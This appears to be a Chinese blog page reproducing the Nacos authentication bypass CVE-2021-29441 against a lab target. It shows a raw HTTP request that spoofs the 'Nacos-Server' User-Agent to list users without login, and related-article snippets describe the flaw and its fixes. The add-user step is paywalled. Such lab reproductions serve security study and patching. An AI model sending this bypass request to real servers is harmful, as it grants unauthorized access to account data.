Nacos认证绕过漏洞(CVE-2021-29441)

最新推荐文章于 2025-06-28 11:50:48 发布
最新推荐文章于 2025-06-28 11:50:48 发布
阅读量2.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 从入门到入狱 文章标签: java 网络 安全 运维 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_18980147/article/details/128348741

Nacos认证绕过漏洞(CVE-2021-29441)

指纹识别

title=nacos

漏洞范围

nacos1.2.0版本-nacos1.4.0版本

漏洞复现

靶机ip:192.168.1.4

默认的nacos登录界面

http://192.168.1.14:8848/nacos/#/login

在这里插入图片描述

利用如下请求包查看只有一个nacos用户

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.1.14:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close

在这里插入图片描述

用如下请求包添加用户


                

                
                
        

    

    
  


        

            

                      
                        最低0.47元/天 解锁文章
                        

                          
200万优质内容无限畅学

                          
                        

                      
            

        


    



                



	

		

			

				
					
Nacos 存在认证绕过漏洞CVE-2021-29441

				
			

			

				

					北方的孤夜
				

				

					06-04
					
					2419
					
				

			

		

		

			
				
Nacos 存在认证绕过漏洞CVE-2021-29441

			
		

	



                

            
              



	

		

			

				
					
Nacos 认证绕过漏洞CVE-2021-29441

				
			

			

				

					gaomei2009的专栏
				

				

					06-20
					
					796
					
				

			

		

		

			
				
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。

			
		

	



              


  
              

                


	

		

			

				
					
Alibaba Nacos权限认证绕过漏洞[CVE-2021-29441]

				
			

			

				

					m0_54323635的博客
				

				

					08-31
					
					1739
					
				

			

		

		

			
				
Alibaba Nacos是阿里巴巴的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

该漏洞Nacos在进行认证授权操作时,会先判断user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。

			
		

	





	

		

			

				
					
# 实战攻防之Nacos漏洞(非常详细)从零基础到精通,收藏这篇就够了!

					
最新发布

				
			

			

				

					Javachichi的博客
				

				

					06-28
					
					1356
					
				

			

		

		

			
				
实战nacos漏洞复现记录一下,大佬勿喷。如果,有不对的可以指正一下,一起学习。Nacos是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台,由阿里巴巴开源。它致力于帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos支持几乎所有主流类型的服务发现、配置和管理,包括Kubernetes Service、gRPC & Dubbo RPC Service、Spring Cloud RESTful Service等。

			
		

	



		

			
		



	

		

			

				
					
nacos未授权-CVE-2021-29441复现

				
			

			

				

					crowsec
				

				

					07-21
					
					8229
					
				

			

		

		

			
				
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...

			
		

	





	

		

			

				
					
Nacos 身份验证绕过漏洞CVE-2021-29441

				
			

			

				

					bmaoHk的博客
				

				

					10-05
					
					1143
					
				

			

		

		

			
				
nacos是阿里巴巴的一个开源项目,旨在帮助构建云原生应用程序和微服务平台,在

			
		

	





	

		

			

				
					
Nacos权限绕过漏洞(CVE-2021-29441)复现

				
			

			

				

					大大怪将军,你来啦!
				

				

					04-14
					
					7142
					
				

			

		

		

			
				
CVE-2021-29441Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问。

			
		

	





	

		

			

				
					
Nacos权限认证绕过漏洞CVE-2021-29441)虚拟机环境下复现

				
			

			

				

					weixin_44656518的博客
				

				

					08-09
					
					1028
					
				

			

		

		

			
				
nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

			
		

	





	

		

			

				
					
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞

				
			

			

				

					ccccai22的博客
				

				

					06-28
					
					927
					
				

			

		

		

			
				
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞

			
		

	





	

		

			

				
					
漏洞预警:Nacos权限绕过漏洞复现(CVE-2021-29441)

				
			

			

				

					yuanlirong22的专栏
				

				

					02-19
					
					1744
					
				

			

		

		

			
				
漏洞预警:Nacos权限绕过漏洞复现(CVE-2021-29441)

			
		

	





	

		

			

				
					
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效

				
			

			

				

					majunssz的博客
				

				

					04-22
					
					1万+
					
				

			

		

		

			
				
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效



2.可以通过外网随意添加nacos用户名及密码








			
		

	





	

		

			

				
					
【渗透实战】Nacos未授权访问(CVE-2021-29441

				
			

			

				

					Nafia的博客
				

				

					02-20
					
					6562
					
				

			

		

		

			
				
Nacos未授权访问漏洞挖掘记录

			
		

	





	

		

			

				
					
nacos权限绕过及未授权访问(CVE-2021-29441)漏洞解决方案

				
			

			

				

					py_doc的博客
				

				

					04-17
					
					1296
					
				

			

		

		

			
				
5.{nacos-server-2.0.0安装目录}\nacos\conf\application.properties,放开如下注释并按实际配置。2.创建mysql数据库,并初始化数据库,{nacos-server-2.0.0安装目录}\nacos\conf\nacos-mysql.sql。6.启动验证,访问http://ip:8848/nacos,默认用户名密码nacos/nacosnacos开启权限认证,如何配置,应用如何配置?7.nacos开启权限认证,如何配置,应用如何配置。

			
		

	





	

		

			

				
					
Nacos漏洞修复】Nacos未授权访问漏洞(CVE-2021-29441)

				
			

			

				

					m0_52985087的博客
				

				

					03-20
					
					1万+
					
				

			

		

		

			
				
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'

			
		

	





	

		

			

				
					
Nacos 漏洞汇总

				
			

			

				

					Bird&Bird
				

				

					03-11
					
					1万+
					
				

			

		

		

			
				
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-S

			
		

	





	

		

			

				
					
Nacos 未授权访问(CVE-2021-29441)

				
			

			

				

					m0_62207170的博客
				

				

					08-30
					
					1247
					
				

			

		

		

			
				
Nacos 未授权访问(CVE-2021-29441)

			
		

	





	

		

			

				
					
nacos权限绕过漏洞(CVE-2021-29441)修复

					
热门推荐

				
			

			

				

					优快云HmCxy的博客
				

				

					09-16
					
					2万+
					
				

			

		

		

			
				
漏扫出服务器的nacos1.2.1版本存在权限绕过漏洞(CVE-2021-29441)漏洞,给出的建议是升级到最新版本,后面去nacos官网当时最新版本是2.0.3,果断换成了当时最新的再让安全人员漏扫发现还是存在,明明官网已经说2.0.0以上版本已经修复了,怎么还是被扫到呢?通过网上翻看资料得到如下解决办法:
1、修改 nacos的application.properties配置文件,开启服务身份识别功能
### 开启鉴权
nacos.core.auth.enabled=true

### 关闭使用use

			
		

	





	

		

			

				
					
NACOS漏洞问题及修复(CVE-2021-29441)

				
			

			

				

					Hoopy_Hoopy的博客
				

				

					09-14
					
					2万+
					
				

			

		

		

			
				
目录

1.漏洞相关问题

2.场景复现

2.1访问用户列表界面

2.2添加新用户

2.3再次查看用户列表

3.nacos升级

4.代码升级

1.漏洞相关问题

漏洞相关地址

CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20

			
		

	





	

		

			

				
					
 nacos权限绕过漏洞(CVE-2021-29441)

				
			

			

				

					10-26
				

			

		

		

			
				
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值